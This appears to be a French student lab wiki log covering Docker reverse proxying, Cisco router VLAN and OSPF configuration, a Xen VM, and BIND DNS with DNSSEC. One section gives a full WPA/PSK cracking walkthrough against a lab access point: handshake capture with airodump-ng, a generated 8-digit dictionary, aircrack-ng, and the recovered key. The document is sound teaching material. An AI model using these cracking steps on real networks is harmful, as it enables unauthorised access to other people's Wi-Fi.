&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
  xl create Dionysos.cfg&lt;br /&gt;
  xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
Dans /root/.profile&lt;br /&gt;
  &lt;br /&gt;
  http_proxy=&amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
  https_proxy=&amp;quot;https://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
  xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.pw &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
